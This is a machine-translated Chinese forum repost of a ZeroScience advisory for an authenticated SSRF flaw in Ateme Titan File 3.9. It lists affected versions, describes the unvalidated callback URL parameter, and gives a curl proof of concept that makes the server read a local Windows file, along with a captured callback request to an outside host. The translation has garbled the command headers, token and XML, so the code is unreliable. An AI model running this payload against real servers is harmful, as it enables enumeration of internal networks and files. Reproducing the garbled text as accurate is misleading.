H

Ateme Titan File 3.9 -SSRF文件枚举

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#Exploit title: Ateme Titan文件3.9 -SSRF文件枚举
#Exploit作者:液态虫
vendor: Ateme
产品网页: https://www.ateme.com
受影响的版本: 3.9.12.4
3.9.11.0
3.9.9.2
3.9.8.0
summary:泰坦文件是一个多用途/格式视频转码
软件,用于夹层,STB和ABR VOD,后期播放
和档案应用程序。泰坦文件基于Ateme第五代
流压缩引擎并提供最高的视频质量
至少具有加速并行处理的比特率。
DESC:身份验证的服务器端请求伪造(SSRF)漏洞
存在于泰坦文件中的视频转编码软件中。应用程序
解析用户在作业回调URL获取参数中提供的数据。自从
没有对参数进行验证,攻击者可以指定
外部域,并迫使应用程序制作http/dns/file
请求任意目的地。这可以由外部使用
例如,攻击者绕过防火墙并启动服务,文件
通过受影响的内部网络上的网络枚举
应用。
在: Microsoft Windows上测试
nodejs
Ateme KFE软件
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5781
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5781.php
22.04.2023
- -
curl -vk -h'x-titan-web-hastoken: true'\
-h'x-titan-web-token3360 54e83a8b-e9e9-9c87-886a-886a-12cb091ab251'\
-h''user-agent: sunee-mode'\
'https://10.0.0.8/cmd?data=callback_testurl!
致电File: //C: \\ Windows \\ System.ini返回0
---
服务器的HTTP
-----------------------
POST/HTTP/1.1
host: ssrftest.zeroscience.mk
ACCEPT: /
Content-Type:应用程序/XML
内容长度: 192
?xml版本='1.0'encoding='utf-8'?
更新
ID0000/ID
命名为测试工作/名称
状态表/状态
进度50/进度
MessageMessage/消息
/更新
 
后退
顶部